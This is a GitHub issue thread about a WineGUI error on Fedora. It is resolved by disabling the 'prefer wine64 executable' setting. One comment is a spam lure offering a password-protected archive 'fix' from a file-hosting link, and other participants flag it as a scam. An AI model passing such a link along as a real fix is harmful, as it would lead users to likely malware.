### ISSUE TITLE
(winearch is set to win32, but not supported in winewow64 mode) on fedora

### ISSUE THREAD

**Issue by DaRandomCube** [winegui/WineGUI#32]
so, i was following a guide to install ms office on wine, and i need winegui for that as bottles doesn't ship all of winetricks dlls
tried making a windows 7 32bit prefix, and this is what came to me
![image](https://github.com/user-attachments/assets/1f4c59f7-478e-4a70-acc4-c55409b8594e)
the official `winehq` packages won't be detected, so i'm stuck with upstream wine
system: fedora 40

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by DaRandomCube** [comment]
thanks
will inspect the script later

**Comment by DaRandomCube** [comment]
failed phishing/scamming/whateverIt'sCalled attempt
i'm on linux, so windows tools won't work
the zipped file with password is a red flag

**Comment by DaRandomCube** [comment]
lmao the scammer deleated
back for the issue

**Comment by melroy89** [comment]
> failed phishing/scamming/whateverIt'sCalled attempt i'm on linux, so windows tools won't work the zipped file with password is a red flag

Recently github platform is under spam attack of these bots. Super annoying indeed. So watch out.

**Comment by DaRandomCube** [comment]
ok
anyway, how to solve it?

**Comment by melroy89** [comment]
Yes, I believe you're selected to forcefully use wine64 in the generic settings menu of winegui. Don't do that. Change that generic setting back.

I will also add a warning to that setting now, since you shouldn't set it to wine64 unless you know what you do.

**Comment by DaRandomCube** [comment]
oh tysm
as for a bit clearer instruction
in winegui top toolbar, press file > preferences
and disable prefer wine64 executable
![image](https://github.com/user-attachments/assets/072cce14-6420-4edd-8ece-47e654e61fae)

**Comment by melroy89** [comment]
Exactly
